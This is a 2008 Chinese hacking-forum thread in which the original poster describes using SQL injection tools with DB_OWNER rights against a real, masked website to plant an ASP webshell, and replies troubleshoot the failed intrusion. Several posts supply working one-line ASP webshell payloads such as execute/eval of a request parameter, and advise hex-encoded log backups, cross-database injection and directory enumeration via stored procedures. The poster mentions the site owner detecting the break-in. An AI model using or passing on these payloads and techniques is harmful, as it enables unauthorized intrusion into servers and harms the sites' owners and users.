Board logo

标题: [讨论]关于注入后得到DB_OWNER权限的Getwebshell提交成功却无法连接 [打印本页]

作者: richy    时间: 2008-7-20 23:21     标题: [讨论]关于注入后得到DB_OWNER权限的Getwebshell提交成功却无法连接

[讨论]关于注入后得到DB_OWNER权限的Getwebshell提交成功却无法连接
议题作者:Yyb1813
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

经过几小时的测试,依然没办法将站拿下传马不成功。

使用软件nbsi3.0找到注入点,权限为:DB_OWNER,知用户名不知密码,拿到数据库:tv_Data

使用nbsi3.0查找目录却无法查到网站目录,应而使用明小子猜到同一服务器下的一目录为:e:\web\mpo\此站点支持asp 并且网站为: http://www.***.com/ 可以打开。


使用nbsi3.0自带的Getwebshell却无法将文件写入e:\web\mpo\001.asp
查看发现001.asp写不进去。

使用GetWebshellah56bug大众版.也不行。

最后使用:xiaolu写的Getwebshell提交后将文件成功写入。查看:e:\web\mpo\001.asp
存在。

打开对应网站:http://www.***.com/ 001.asp提示如下:

Microsoft VBScript 编译器错误 错误 '800a0408'

无效字符

/001.asp,行 4338

I?扴?

=============为什么会这样???
我用一句话修改去连接无效。用蓝屏一句话连接也无效,修改xiaolu写的Getwebshell为蓝屏等的连接:<%execute request("l")%>
多种方法还是没办法成功,连接不上。

我要如何做了。搞了一天没解决。

[s:92]
帖子66 精华0 积分209 阅读权限40 在线时间46 小时 注册时间2006-1-19 最后登录2008-7-12 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)


first_0
晶莹剔透§烈日灼然
作者: 实质    时间: 2008-7-20 23:21

数据库不干净,有权限的话,换个数据库备
帖子12 精华0 积分64 阅读权限40 在线时间0 小时 注册时间2005-2-22 最后登录2007-11-29 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

virus-y2k
晶莹剔透§烈日灼然
作者: MetalGear    时间: 2008-7-20 23:21

这个简单。。用臭要饭的webshell导入大法吧~
帖子42 精华0 积分149 阅读权限40 性别男 在线时间7 小时 注册时间2006-3-24 最后登录2008-1-11 查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

安静
晶莹剔透§烈日灼然
作者: WKS    时间: 2008-7-20 23:21

手工log备份比较好~
最好是用16进制
帖子4 精华0 积分19 阅读权限40 在线时间9 小时 注册时间2005-7-6 最后登录2007-3-22 查看详细资料引用 报告 回复 TOP

hack520
运维管理组

作者: szxrszxr    时间: 2008-7-20 23:21

[s:75] 没插进去~~~~到insert那步出错了...建议换个库插插插 [s:82]Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
帖子1082 精华6 积分5597 阅读权限150 性别男 在线时间576 小时 注册时间2005-3-18 最后登录2008-7-2 查看个人网站
查看详细资料引用 报告 回复 TOP 软件项目外包

yyb1813
晶莹剔透§烈日灼然
作者: 周星星    时间: 2008-7-20 23:21

引用:
这里是引用第[5 楼]的hack520于2006-08-01 02:56发表的:
[s:75] 没插进去~~~~到insert那步出错了...建议换个库插插插 [s:82]
猪三哥啊,我天天在啃你的注入,都没搞掂,现在这个飞了。
呵呵。这是宁波的服务器,现在给他发现了,什么权限都没有了,什么文件夹都设成只读了,哎,没了没了!
帖子66 精华0 积分209 阅读权限40 在线时间46 小时 注册时间2006-1-19 最后登录2008-7-12 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

kuangzhu
晶莹剔透§烈日灼然
作者: TOABY    时间: 2008-7-20 23:21

换冰狐的那个小马插然后用一句话客户连也可以我试过
帖子2 精华0 积分9 阅读权限40 在线时间2 小时 注册时间2005-11-1 最后登录2007-1-5 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

神無月
晶莹剔透§烈日灼然
作者: bp0769    时间: 2008-7-20 23:21

用EVAL吧
不行就试试转换一下一句马
<%execute(request("l"))%>
<%%25execute(request("l"))%%25>都试试吧。~
帖子124 精华0 积分313 阅读权限40 性别男 在线时间37 小时 注册时间2006-4-22 最后登录2008-6-9 查看详细资料引用 报告 回复 TOP

remax
晶莹剔透§烈日灼然
作者: 蓝精灵    时间: 2008-7-20 23:22

估计是数据库里有%,反正出不来~。~20字节够写什么?

帖子325 精华2 积分911 阅读权限50 在线时间79 小时 注册时间2005-10-25 最后登录2008-7-13 查看个人网站
查看详细资料引用 报告 回复 TOP

唐不狐
很黃很暴力

晶莹剔透§烈日灼然
作者: 叶王子    时间: 2008-7-20 23:22

遇到过
1 重新寻找注射点,目的是换库。这点注射工具可检测出
2 多次备份。还是用导出日志大法比较好,备份出来的文件大小都比较理想
帖子145 精华2 积分574 阅读权限50 性别男 来自china 在线时间106 小时 注册时间2005-9-27 最后登录2008-7-9 查看个人网站
查看详细资料引用 报告 回复 TOP

popo0421
晶莹剔透§烈日灼然
作者: procar    时间: 2008-7-20 23:22

可能是服务器的asp 过滤了一些东西,换个注入点再试试,
找不同目录下的asp , 应该可以找出不同数据库的可用注入点
帖子8 精华0 积分30 阅读权限40 性别男 在线时间0 小时 注册时间2006-1-9 最后登录2008-2-4 查看详细资料引用 报告 回复 TOP

独孤依人
荣誉会员

作者: 枫枫    时间: 2008-7-20 23:22

可能你备份的目录没有写入权限脚本安全小组:Www.Cnsst.Org MSN:cn557@hotmail.com  我们这帮兄弟,永远的兄弟——We are not the only ones,but we will try to be the best!——All In Script 脚本渗透自用利器开发中……
帖子298 精华12 积分3962 阅读权限100 性别男 在线时间901 小时 注册时间2006-4-22 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

--------
晶莹剔透§烈日灼然
作者: 沙包    时间: 2008-7-20 23:22

Sql db_owner权限注入成功之后,
通过读取注册表拿web路径,但没权限,读取失败.
现在改用xp_redtree过程读取硬盘目录,能读取,并且保存在test表中,
通过openrowset远程insert失败,提示连接失败(我自己计算机能连,它不能连,应该不是外部数据库问题吧).

想请教的是:现在如何读取test表的所有内容?
我想过用猜解,但是怕慢.

有人有更好方法吗
帖子3 精华0 积分10 阅读权限40 在线时间66 小时 注册时间2006-7-27 最后登录2008-6-6 查看详细资料引用 报告 回复 TOP

asm
运维管理组

作者: POLO劲情~怀    时间: 2008-7-20 23:22

如果是要入侵,那就换别的方法,别吊死在一棵树上

如果是解决这个问题,我建议你去查查关于asp的错误号,估计会有眉目...游戏吧  http://www.game8.cc/MyBlog    http://www.asm32.cn
帖子1598 精华30 积分8742 阅读权限150 性别男 在线时间954 小时 注册时间2006-9-21 最后登录2008-7-20 查看详细资料引用 报告 回复 TOP

r00t
晶莹剔透§烈日灼然
作者: 都市狂飚    时间: 2008-7-20 23:22

如果找到库的位置,手动LOG备份吧,就象楼楼上的最好用16进制的。
帖子2 精华0 积分12 阅读权限40 在线时间0 小时 注册时间2006-7-11 最后登录2006-10-12 查看详细资料引用 报告 回复 TOP

tlhelen
晶莹剔透§烈日灼然
作者: 小乖    时间: 2008-7-20 23:22

一句话木马成功依赖于两个条件:
1、服务端没有禁止adodb.Stream或FSO组件
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
帖子19 精华0 积分57 阅读权限40 在线时间51 小时 注册时间2005-10-18 最后登录2008-3-24 查看详细资料引用 报告 回复 TOP

xg530
晶莹剔透§烈日灼然
作者: 阿世    时间: 2008-7-20 23:22

谁有aspx的一句话啊`找了好长时间没找到了```郁闷死`
帖子16 精华0 积分51 阅读权限40 在线时间44 小时 注册时间2005-8-30 最后登录2008-3-28 查看详细资料引用 报告 回复 TOP

justcrack
荣誉会员

作者: 老虎仔    时间: 2008-7-20 23:22

引用:
引用第10楼唐不狐于2006-08-16 22:10发表的:
遇到过
1 重新寻找注射点,目的是换库。这点注射工具可检测出
2 多次备份。还是用导出日志大法比较好,备份出来的文件大小都比较理想
如果有其他库权限直接跨库就可以了。
个人认为一个站多个数据库又有多个注射点对应不同库的几率不如一个用户多个库的权限的几率大。广告位招租。
帖子40 精华0 积分196804 阅读权限100 在线时间86 小时 注册时间2006-2-2 最后登录2008-2-21 查看详细资料引用 报告 回复 TOP

freedom
晶莹剔透§烈日灼然
作者: 警警    时间: 2008-7-20 23:22

换成这样试试<%eval(request("l"))%>。或改变为十六进制。
顺便借此宝地问一下DB_OWNER权限下怎样用SQL语句暴出网站路径努力就会成功
帖子6 精华0 积分23 阅读权限40 性别男 在线时间46 小时 注册时间2005-8-4 最后登录2008-7-20 查看详细资料引用 报告 回复 TOP

jxsaqjh
晶莹剔透§烈日灼然
作者: 雪欧飞狐    时间: 2008-7-20 23:22

我也遇到过,一句已经写入成功,可是旧在上船木马的时候不成功。。
或者是提示上船成功,可是连接出现404,或者干脆旧不能上船jxsaqjh.cn

帖子36 精华0 积分99 阅读权限40 性别男 在线时间15 小时 注册时间2006-10-23 最后登录2008-4-9 查看详细资料引用 报告 回复 TOP

qmttz
晶莹剔透§烈日灼然
作者: ygw92711    时间: 2008-7-20 23:22

鄙人,把各种一句话服务端试过以后,再用NBSI插入,木马成功执行。

但鄙人并不知道原因,还请高手赐教。
帖子1 精华0 积分6 阅读权限40 在线时间11 小时 注册时间2006-6-10 最后登录2008-6-28 查看详细资料引用 报告 回复 TOP

hitlerboy
晶莹剔透§烈日灼然
作者: 小妖    时间: 2008-7-20 23:22

曾经遇到跟楼主一样的情况,
一句话插入,生成的asp文件,访问存在,就是链接不了。
错误号没看,也许不一样。
然后尝试log备份,直接失败。
帖子79 精华0 积分274 阅读权限40 性别男 在线时间182 小时 注册时间2006-5-7 最后登录2008-4-11 查看详细资料引用 报告 回复 TOP

lalayyj123
晶莹剔透§烈日灼然
作者: hxpaaa    时间: 2008-7-20 23:22

关于手工LOG备分,每一步返回的页面都正常,可惜还是找不到备分的文件。还有,我下载了几个NBSI,都检查不出漏洞,而啊D却可以,是NBSI的版本问题吗?
帖子7 精华0 积分21 阅读权限40 在线时间4 小时 注册时间2007-5-24 最后登录2007-5-27 查看详细资料引用 报告 回复 TOP

zp260
晶莹剔透§烈日灼然
作者: 波柱    时间: 2008-7-20 23:22

我也遇到这样的情况真麻烦啊。。。多换换工具,代码也换成16进制,或者把符号都转义下试把。。多一种路子多一个成功的机会了
帖子13 精华0 积分25 阅读权限40 在线时间21 小时 注册时间2007-4-11 最后登录2008-6-23 查看详细资料引用 报告 回复 TOP

xln28118
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2